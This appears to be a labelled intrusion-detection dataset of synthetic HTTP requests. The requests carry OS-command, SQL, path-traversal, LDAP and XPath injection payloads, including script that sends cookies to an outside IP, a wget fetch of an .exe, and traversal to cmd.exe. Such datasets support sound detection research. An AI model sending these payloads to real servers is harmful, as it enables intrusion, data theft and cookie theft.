GET /aDt1s/a3/rA9T9iA6.jpeg?orIFkRSo@=bhiisneioaq&SdimgD6=%3Cobject+++++classid++++%3D++%22++clsid%3A...+++%22+++codebase++++%3D++++%22++++javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F233.183.18.156%2Fie.sh%27%2Bdocument.cookie%29%3B%5D%22+%3E&waa=o%24log%5C%3Bmfk&sy=IulMaI&aipa2erotoa=860681710&include-BMG4Z0X=ua%7E+eoa%3EeieioTaxp_&rthoc8eRy=nopacnats&oeYs=28082 HTTP/1.0
Host: www.27eapn.net:9943
Connection: close
Accept: */*
Accept-Charset: windows-1253;q=0.8
Accept-Encoding: *
Accept-Language: 711ln6i6-90glla;q=0.8, Dnywue-tp1om, eOer-Mhqo;q=0.9
Cache-Control: max-age=8681
Client-ip: 226.203.48.223
Cookie: Wniibn=yexecge7eMt;mHhsz=858426670
Cookie2: $Version="1"
Date: Sat, 08 Jul 06 09:19:32 UTC
ETag: "XjJvcVzPg2kiAhQYG2q"
Expect: scSR=iog8
From: told@ol9na.de
If-Modified-Since: Wed, 13 Oct 04 11:51:35 GMT
If-Unmodified-Since: Sat, 23 May 09 21:42:32 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 04 Sep 07 01:08:15 UTC
Max-Forwards: 8994
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: eljvaE dmsot=omnus5
Range: -40347,67-1
Referer: /Tsormr/msao3ai.rar
TE: deflate,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.1 (X11; U; SunOS sun4u 0.0; je-ma; rv:8.2.9) Gecko/36213859
UA-CPU: Sparc
UA-Disp: 3262,6443,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: 9.3 www.asgbtTge.jpeg:898, 9.1 221.28.94.238:09017, 5.5 www.oeEqemc.png
Transfer-Encoding: ahyUR
Upgrade: nPcun/8.0, aNCmem/7.3, aiz/3.2, 5no/1.9
Warning: 444 214.91.5.142:2 "utenrsgvrEdai" 
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 1360027
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47303
Start - Id: 43849
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 32.204.162.70:6
Connection: close
Accept: application/*
Accept-Charset: x-mac-korean, iso-8859-6;q=0.0, windows-1252
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=597
Client-ip: 59.162.229.57
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="07"
Date: Mon, 24 May 04 05:54:00 UTC
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Thu, 06 Nov 08 24:34:59 CET
If-Unmodified-Since: Sun, 04 Jul 04 24:36:37 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Oct 06 12:51:08 GMT
Max-Forwards: 3
MIME-Version: 1.9
Pragma: aeriel='oyet9ss'
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: Basic b2VUdXNldDpyMzVzOXM=
Range: 064373-124259,214-265,801-679
Referer: /hr1tisin.sh
TE: trailers
Trailer: User-Agent
User-Agent: nIYFVF6Ki http://www.strjei.be
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: 1.6 www.niou.png:6
Transfer-Encoding: IaUt
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43849
Start - Id: 36721
class: OsCommanding
GET /gygMV28a@2/SrlkIchx/a8dtiitowioneeY.nsf?OK3dXCPuZ-=5779&wIaetms7k=%5Cnwget++++http%3A%2F%2F181.234.154.208%3A1465%2Fnftp.exe&onhRt=-+pepna&tfoatmrmitnhe6o=396126&pf4=tkueidatfrHi&miremnheuee63ry=+0opt&llaNat=z&J76eU4=1440&nk=s5ta&org=rhi%2Fupdatet0dturtb1o&atnvYifr=+wgett HTTP/1.0
Host: www.d8tgooWr.st
Connection: close
Accept: */*
Accept-Charset: euc-jp;q=0.7, us-ascii, iso-8859-8
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: min-fresh=21814
Client-ip: 234.49.182.184
Cookie: oiseeIod9=ptoe n4l@ATe7tolr;tge2tt2eioooce=h replace'>;eu3aaAteoe=mAhttpsO;s1ecGxre8xs=29544023;sE2ocdeqirUNol=27118;faamgnbwelre=0815
Cookie2: $Version="821"
Date: Wed, 04 Jun 08 03:49:35 GMT
ETag: "l9Gy9HkIv8mHHdYDo6E"
Expect: ivhahey
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Wed, 14 Feb 07 01:05:49 UTC
If-Unmodified-Since: Tue, 20 Sep 05 18:09:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 927
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=/r38t/bngs5.css
Range: 36-238879
Referer: /indir/loaa/neIsg.exe
TE: trailers
Trailer: Cache-Control
User-Agent: sMqBT7wiP http://www.er64.fr
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 656x0255
Via: HTTP/5.0 196.208.230.20
Transfer-Encoding: iai5; 7htdt43t=hees
X-Forwarded-For: 18.24.168.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36721
Start - Id: 35192
class: SqlInjection
GET /btoioue2ratbednd/raoyit49scze/f7Li5a4iota/nofgolqwv/siwfObQGxxm/yc.V9vZe/3guhtEvntemenea7osA/t2NhCRSWKsqquX_Sy8/gc/i0romqnae/bnemsowNulp0neFtu.mspx?8eri=8&Owp0xa=8&eftnntlpat=633&jAyVvo=useaeopT&awTaosry=96780&aHeOtiu=7aa9e1u4ix&rcpO@H=replacet8oyeUlo+&nN=ceeftp%7CieFaleeuys&ysbrharsdOdag=hfxZ&cesim4=%27+++++or++++id+in++%28+++select+*++++from++++++++user_db+++%29&X_7l=ekl%2BTkdaedyea&mExosaeiuts=%3Dsp&R4g=%5Dsgoh5wnanyety&d9vms8aoNsO77Ow=qygogoet&JlincludeFT=t4WR HTTP/1.1
Host: www.NMhnn.st
Connection: teikpt
Accept: */*
Accept-Charset: x-mac-turkish;q=0.7, cp-936;q=0.8, cp-936
Accept-Encoding: 
Accept-Language: yarlalt-miariO;q=0.3, 1aU-se6sr;q=0.8, m-resfe
Cache-Control: max-age=8
Client-ip: 12.218.241.252
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Mon, 26 Nov 07 21:30:46 UTC
ETag: "Q7ymttM9lu3GrvwrJmu."
Expect: 100-continue
From: ei5rasmn@Is8otu4t.com
If-Modified-Since: Sat, 21 Jul 07 11:51:13 CET
If-Unmodified-Since: Thu, 14 Sep 06 11:50:58 GMT
If-Match: "m8BjQ74.p59y.Xj"
If-None-Match: *
If-Range: Sun, 25 Dec 05 16:59:24 UTC
Max-Forwards: 230
MIME-Version: 2.3
Pragma: sl='Ak'
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: Basic aXRpZUV1b3A6ZHJ0dQ==
Range: 7416-9436,-80
Referer: http://www.azoIycn.biz/amtis9ta.jsp
TE: chunked,chunked
Trailer: Accept
User-Agent: emeznl2cpn8daioHs
UA-CPU: StrongARM
UA-Disp: 1981,291,8
UA-Color: color32
UA-Pixels: 0990x1742
Via: OiraAi/7.4 108.17.167.77, 3.4 www.nSbvldn.js
Transfer-Encoding: identity
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 33888894835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35192
Start - Id: 45689
class: PathTransversal
GET /hoKTR8XCGZSxur/aEpUyK4ALui_s0vM/ewMtH0SK.pl?oaiiaaoel=96838&nieociaetdohyc=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&Inbf3eeussor=M0heafI%3ChindN%3Ee&ytuhecyu=fh+gpioeh%3Ee0&9z=insert%2Bg%5Dfe7Gphoboot.ini+ HTTP/1.0
Host: 125.236.18.178
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: eehae-ore, i-9l8qh;q=0.0
Cache-Control: max-stale
Client-ip: 10.24.0.201
Cookie: tv=8l;selectorNF8=C6n;UJU4G9EuW5H=osrcninnn;dmy7ag5Xuo5tejP=78395511
Cookie2: $Version="55"
Date: Thu, 18 Aug 05 11:42:49 GMT
ETag: "te5LXUt5O3OOLfUO"
Expect: to4thr
From: esIpsioy@eehlxsang.it
If-Modified-Since: Wed, 01 Jun 05 04:33:33 GMT
If-Unmodified-Since: Mon, 25 Oct 04 18:32:58 UTC
If-Match: "z7iIuHG8R-G9@xFCGYK"
If-None-Match: *
If-Range: Sat, 18 Jul 09 14:32:22 UTC
Max-Forwards: 6269
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest nc=dFd20C70
Authorization: Digest uri=http://www.retn7h.it/rque/hisSqa/Inhbiy/stshrEnt/eOirttc.mdb
Range: -934,-807,-703421
Referer: http://5hEnsoe.be/radr/AOhqaeo.dll
TE: gzip;q=0.3,deflate,chunked;q=0.0
Trailer: If-None-Match
User-Agent: lpvkbeadn/9.4.1.8
UA-CPU: StrongARM
UA-Disp: 3926,182,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: hx5et/4.1 74.173.82.126, 1.2 195.195.15.22
Transfer-Encoding: compress
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45689
Start - Id: 38621
class: LdapInjection
GET /iITJnqih/9qenrh7cgneg/mpeN6sKsi/rXg5NjhObRDQ/tlikeOGaHqP/lvFA6VQ.js?m4sIwnanih=%2B7dcl%25%29uC%40sNsncja%2Bue&ct0ae2tGbHene=bettfap+sti&dmNtwo7oo=tvcMSN&0eensrhlretgn=35010&lUCcF=p-k.qIoj&hehanAsloUlcoah=%3Bpi&oRqfNQbin=rNa8gdlil&eidh=srernosese&tifqa=p&wn1Spoh9bnnlh=9071086&trtoads7s=%29++%28++++%7C%28uO%3Didt*%29&psFTposition=98&b2=https%29rn HTTP/1.0
Host: 62.84.116.29
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.6, compress, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 172.60.208.32
Cookie: C6H0is=aLEiexectt/prLctmp;ve2mto=3a;tei3Y3mcms=t3etn0icpg;jc98odu=r0o-kt8nw8likeinnacE
Cookie2: $Version="4"
Date: Fri, 10 Mar 06 10:13:07 GMT
ETag: W/"78VQV6Gzdd4iSe."
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Sat, 22 May 04 14:05:09 GMT
If-Unmodified-Since: Tue, 02 Oct 07 15:54:54 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Jul 05 17:52:11 UTC
Max-Forwards: 5
MIME-Version: 0.3
Pragma: hre=a8tkfii
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: n79iy LycOoh=2diisb
Range: 66206-063
Referer: /leMwo/Iebn/aisS/1udj/nt9gt.nsf
TE: trailers,trailers
Trailer: If-Range
User-Agent: tehlpgfeCi/0.0
UA-CPU: x86
UA-Disp: 6369,756,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: HTTP/5.1 www.txgenIay.js, 3.1 www.czus.js
Transfer-Encoding: iatow; 0af0t=uuohet
Upgrade: rpeyc/9.4, l7e/9.7, Ouhf/0.7, rzONo/2.0
Warning: 385 www.ietrrth1.htm "wefuh94ogoiYectles" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38621
Start - Id: 35949
class: PathTransversal
GET /tQfEeBWHHtsn6d_wLE.cgi?tt0Ywindow.openpasswdGbZ=e9ilhwts0d&bee8Ri5y3i=e+&2r=ovV8Ubz2w&er7Rx4=npmePpnPjG&4r=n%28po%5Cft%29KmeoniaOdropx6&_07hj4E_iQ@=ad+he&cdeLa3edemn=%3C%21--++++%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&xh4n3eidhE=6405 HTTP/1.0
Host: www.am72fr.com
Connection: puRdEotz
Accept: image/gif;q=0.5
Accept-Charset: *
Accept-Encoding: identity, deflate, compress
Accept-Language: *;q=0.0
Cache-Control: min-fresh=980
Client-ip: 51.18.212.153
Cookie: imdfaoebM0myrmo=eKwISHXp;aS=wpu3tE;dnee3eicntbRsl6= logUut;eZvDVZvClI==e&d systemn6tlensaccess_logtelnet;Lnas=4
Cookie2: $Version="31"
Date: Sun, 11 Apr 04 24:16:17 UTC
ETag: W/"go65Ar8hZVqfboYrTU"
Expect: 100-continue
From: VhEec8@alpudeo.biz
If-Modified-Since: Mon, 12 Jan 04 23:55:38 CET
If-Match: "Qq29--5pw8m4.UV2N0x"
If-None-Match: *
If-Range: *
Max-Forwards: 6618
Pragma: no-cache
Referer: /prasz/lveADibo/imreah/Rntuasd.swf
TE: gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: ivrcmac4RJuua
UA-Pixels: 612x0492
Via: 6.0 www.lreld.tiff, HTTP/2.4 199.48.62.246, FTP/5.1 206.52.31.118
Transfer-Encoding: rqysd
Upgrade: rNetn/9.6, Otc/8.0, fekc/6.8, trlls/0.1
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35949
Start - Id: 36924
class: LdapInjection
POST /aiysEs6gcilReiga/tocswGeLaSh5sf9/fobZ@1o/gah/u4ITJPty.dll? HTTP/1.1
Content-Length: 156
Content-Language: fhem
Content-Encoding: gzip
Content-Location: http://www.aairn.de/tyHsreme/artsh/l2f9/eLe3.jpeg
Content-MD5: eGRzYWhyYW4xeWlsYzQ5RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Dec 09 03:05:51 UTC
Last-Modified: Mon, 06 Sep 04 09:27:29 GMT
Host: 203.239.82.64
Connection: gseaH9e
Accept: text/*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: cipogbg-or;q=0.6
Cache-Control: a='Dii'
Client-ip: 23.24.154.22
Cookie: demOoomh=h@bEREJD;eeh2c=93;QrBnys=crrphap~&is;ha0duria67i=O4aeformAr;toErAefla=[r2uiuit
Cookie2: $Version="08"
Date: Sat, 11 Oct 08 13:57:12 GMT
ETag: W/"d7Bmeqt30DrvtRfk"
Expect: 100-continue
From: dhafadn@folsiatle.com
If-Modified-Since: Fri, 01 Dec 06 22:26:15 CET
If-Unmodified-Since: Fri, 17 Nov 06 08:17:43 GMT
If-Match: *
If-None-Match: "DU4x.HM2gYYPDUH2eZbK"
If-Range: Sat, 31 Jan 09 07:42:57 GMT
Max-Forwards: 2496
MIME-Version: 5.9
Pragma: OecrGjt=kae9ne
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest opaque="guaid"
Range: 31-,450738-9829
Referer: /8osymeta/9ostr/lAm7cw/tere/Kous2.gz
TE: deflate,chunked,gzip;q=0.6
Trailer: Accept
User-Agent: Mozilla/2.1 (X11; U; SunOS sun4u 2.7; eo-pb; rv:0.4.6) Gecko/77040024
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x0585
Via: HTTP/5.3 www.ensto.tiff:56, 4.4 50.251.208.228
Transfer-Encoding: gzip
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 591 www.lalfoh.gif "ed6niocL" "Fri, 23 Feb 07 23:24:32 CET"
X-Forwarded-For: 189.182.231.41
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

Jag9v=rldrnldn&omoqsBa=3a0dt]&ratubefo=r14073nedeJy&wrhoh=9881749307&a3ms=17)(&(objectClass=rf4t)(|(sn =irmE)(cn=wIT    J*))

End - Id: 36924
Start - Id: 43410
class: OsCommanding
GET /P88Lszom-HU/phE.3xHZPrnhixoyV5TT/nvOa6m./cw6stehJomEea8Tewc/3ydhnaip/pl18u/adgoxedEeaAwoBwaa7n.shtml?e4Emoii9oifht=anlp0&axtueeutngtdgcy=oieeeorj&cu7oggoitdh=%7C++ps+-auxwww++%3B HTTP/1.0
Host: 61.131.103.129
Connection: 1hoco
Accept: */*
Accept-Charset: iso-8859-6, koi8-r
Accept-Encoding: 
Accept-Language: gS1l-m4st
Cache-Control: max-stale=57
Client-ip: 5.203.243.165
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Fri, 07 Jul 06 10:24:51 CET
ETag: "jIrF8GB@jiqHJsgpERvI"
Expect: lcyAtaet=mdtsuia;3eba
From: fikl0E@tRser.fr
If-Modified-Since: Thu, 18 Mar 04 21:47:54 UTC
If-Unmodified-Since: Sun, 01 Oct 06 07:14:07 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 792
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Digest qop=auth-int
Range: 6-,47-768842,6146-09
Referer: http://Ncsf.cz/bsqth/le4fo/ou4iPB.nsf
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/3.0 (Windows; U; Win 9x 0.2; th-1r; rv:3.1.3) Gecko/72832313
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 784x7267
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: compress
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 193.68.229.100
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43410
Start - Id: 49169
class: XPathInjection
GET /3oyYeU3d./6jTiQYYoth6I/9OkjFwindow.openoopenVperlFewhere/4zmnhhycEbnwasstdt6e/bz33FBUnAzErD/erN08O_3qyebGEI2/c8lr8br.DAmlclTL/73tlTmsydieD/m5nQELRtBs7sj2u.mdb?tocIlotMa=487366&ifrm6a=t860t83D8&ciotmott=p4a1savHmi2itdstLu&XO9P5T289=e2cac%27+++or++1%3C++++nto%2Fcebr%2F9%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D54%5D++or+++++%27dia9%27%3D%27&ehud=7u HTTP/1.0
Host: 3.51.187.49
Connection: close
Accept: application/x-tar;q=0.0
Accept-Charset: cp-936, macintosh, cp-936, windows-1250, cp-950
Accept-Encoding: 
Accept-Language: j-vgielmd;q=0.3
Cache-Control: o=s
Client-ip: 38.175.250.11
Cookie: sbhneobrhi=8516;dnnaojgeelnt=62892;weke=d n2ls;eyteo=0961
Cookie2: $Version="2"
Date: Sat, 31 May 08 13:27:19 CET
ETag: W/"VjavY-udlIsPEF8K8Bw"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Sun, 16 Nov 08 08:04:31 GMT
If-Match: *
If-None-Match: "st4x0Mea.kYgi2.46"
If-Range: "trgV6D-UyCiG0YY4F18"
Max-Forwards: 76
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: eateh mLnr3a9n=pMaMyeni
Range: 96-,87333-9
Referer: /ea9isM/rRqTt.png
TE: trailers,trailers,deflate;q=0.6
Trailer: TE
User-Agent: PenwEpe2m4fra2cabNLt
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 290x3654
Via: 9.4 www.twQntldn.gif
Transfer-Encoding: compress
Upgrade: rum/1.2, bcstu/1.3, zidTat/2.5, dAck5/6.8, hAes/0.3
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 887943993
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49169
Start - Id: 48875
class: XPathInjection
GET /hmg_G@JPaJDaVAy8W.htm?omaYoUo=dd%27%5D+%7C++++P++++%7C+++++%2F%2Fuser%5B+name%2Ftext%28+%29++++%3D++++%27o1imi&lcslmaith=1Ekeheds8FrMcr&WDyGNpG=8Va0WSn&ns=mr+%7Cad HTTP/1.1
Host: 104.41.41.45
Connection: keep-alive
Accept: audio/x-wav;q=0.5
Accept-Charset: x-mac-cyrillic;q=0.4, big5;q=0.4, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=24906
Client-ip: 81.197.139.145
Cookie: 2ioitOcht=549837;emrbcaoen=a/Cimg;qXaaqers=tp@t[itwnodeeane;rooV;Ahme=-tg;jluIpeosedo=sMXxmy-_a.R
Cookie2: $Version="00"
Date: Sat, 05 Jan 08 10:30:35 GMT
ETag: "_fRV_D@7oKn-qsK"
Expect: 100-continue
From: tT6sz@uCil5yEad.be
If-Modified-Since: Sat, 03 Oct 09 03:54:49 UTC
If-Unmodified-Since: Sun, 11 Oct 09 22:42:21 UTC
If-Match: *
If-None-Match: "RZt2ncEPb9yewnPnIlh"
If-Range: Thu, 13 Oct 05 20:28:54 CET
Max-Forwards: 197
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: Basic aTJoaGxzbmI6ZW51cmxkaQ==
Range: 03033-94733
Referer: http://eaiatoRm.org/ct8thcum/nremn3/eJ6eKe/sopmtjt9.mpg
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: uOaqsehap
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: ei8/0.5 191.70.182.30, FTP/5.5 www.yvgdtjcc.jpg
Transfer-Encoding: compress
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48875
Start - Id: 46230
class: PathTransversal
GET /Steepe/rg7r9iI59ixNDs-s/EgZmwS7D7WCandNU/mh3ijhJc7/cafaeb/mheshhS/2ZT/duKbQodAs7z811fW./uuuA.RGl8byYqMn/eiotL1ne/KQLnpHBCfA.swf?TiSw=832&8xpHdN9iA09or=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&sEybsgsasGnn=outa HTTP/1.1
Host: 91.242.67.228:80
Connection: close
Accept: */*
Accept-Charset: windows-1254;q=0.7, windows-1258
Accept-Encoding: deflate, compress, compress;q=0.9, identity;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 55.147.217.219
Cookie: weseoiiwfzcua=35122
Cookie2: $Version="0"
Date: Wed, 02 Apr 08 23:48:54 GMT
ETag: "yc9wTp277f0YoEdYK"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Thu, 26 Nov 09 23:34:56 UTC
If-Unmodified-Since: Sat, 26 Nov 05 23:51:15 CET
If-Match: *
If-None-Match: "sfVc1tpHw8kkgLGk"
If-Range: Sun, 22 Jun 08 23:13:17 GMT
Max-Forwards: 4
MIME-Version: 1.9
Pragma: ukSenif=nroiQ
Proxy-Authorization: sczoan Qaahstc=tldthrl
Authorization: NTLM aWlvNG5lYXJzMmlvZGl0bmNsdXRhbWFIdTFpYWlwYW1vZWJlYWRuMG5kczg=
Range: 173-
Referer: http://www.rcrhaem.de/DheHste/Eastoasi.htm
TE: chunked;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/5.5 (Machintosh; U; PPC 9.6; ee-9b; rv:7.2.2) Gecko/31216924
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6581x3968
Via: 5.6 www.bnmsnhnr.html, 9.5 132.128.219.85:709, FTP/0.0 www.deorWbS.js
Transfer-Encoding: gzip
Upgrade: Sdb/4.1
Warning: 235 www.tpm0.css "YcngsoigutaasdemifSa" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46230
Start - Id: 36636
class: OsCommanding
GET /bin/T7aahwr.pl/seite=;cat eshop.pl|? HTTP/1.0
Host: 78.144.24.13
Connection: ooy2srt
Accept: */*
Accept-Charset: x-mac-icelandic, isiri-3342;q=0.6, iso-8859-3
Accept-Encoding: *;q=0.8
Accept-Language: l-S, pb-1rN;q=0.7, nW-dr
Cache-Control: max-age=4
Cookie: ndhpl1snthiiQp=7;leEd=gxp_tr $foooh slnetcrmCe;eawsnHacaRria=173529427;17sswut=eT04Uyyks;hfseenI=77777982;tsrnfts=psc e 
Cookie2: $Version="74"
ETag: W/"Uz@kS7@BDhdUUqlE@y."
If-Modified-Since: Mon, 11 Feb 08 21:11:40 GMT
If-Unmodified-Since: Sat, 02 Feb 08 04:58:33 GMT
Max-Forwards: 6928
Referer: /lIoR2el/aeinHR/dmevq/Omp9N5.wmn
User-Agent: sspSa9j

null

End - Id: 36636
Start - Id: 37098
class: LdapInjection
GET /htIedv2RdleihRe/rzjRoxXI5cql_/0QdocumentVwexec.McDUC/t-Q3vbFDPBAhHS_AC/dliigsimtehnrbs/or2hgztGmqtmpzOM/jvpSnEfWB7Dd@.jsp?ZsXafo1i=3668&H2lm=iobjectc6&rha5FztphEeJ=500741442&hrEcaaa1b=grwpxeerks&hSgtimvainsec=oqsV5&rdg1aieci=tF2SA1Q6L4&0t4=9&OVCKKUTreplaceJB=%3Dr0e&im508tywaey8=gah+der%7Cooef&TFBuMSQw0=iolcidr&odsitE6=0i%29%28%26%28objectClass%3D+t1s*%29&ef=ooHih HTTP/1.0
Host: 74.132.69.81
Connection: roiy
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.7, euc-tw, iso-2022-jp;q=0.6
Accept-Encoding: 
Accept-Language: eeE-eau
Cache-Control: max-stale=82
Client-ip: 236.39.89.101
Cookie: ano=s1io;teeewt1Dh7tee=6;lnC5=9
Cookie2: $Version="020"
Date: Sat, 12 May 07 11:44:25 UTC
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: idorit=hhox;9ha3ae=2Vh6e
From: 5cih8hH@th6En.it
If-Modified-Since: Thu, 19 Jul 07 02:03:03 GMT
If-Unmodified-Since: Tue, 27 May 08 05:02:12 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic ZGk5b2g6bmZpcmU3
Authorization: Digest uri=http://www.ieofy.fr/etne9/oL1A/s0oe.cfm
Range: 8-29969,-67,432-912142
Referer: /pbozninE/ehset/aokeyatu/teRnehlF.wmn
TE: trailers
Trailer: Via
User-Agent: ty2rt3sh4/2.5.3
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 617x3755
Via: 7.9 www.rawB4lth.htm, mue/1.3 71.62.8.183:2250
Transfer-Encoding: gzip
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 620 www.gRricn.htm "alTyesjrtent3" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 73490105106
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37098
Start - Id: 43666
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 42.88.140.250
Connection: close
Accept: */*;q=0.2
Accept-Charset: euc-jp;q=0.2, x-mac-chinesetrad, x-mac-turkish;q=0.8, windows-1250
Accept-Encoding: 
Accept-Language: aGscn-5oz;q=0.7, Eieot-s;q=0.9, u-0eFl;q=0.7
Cache-Control: max-age=67513
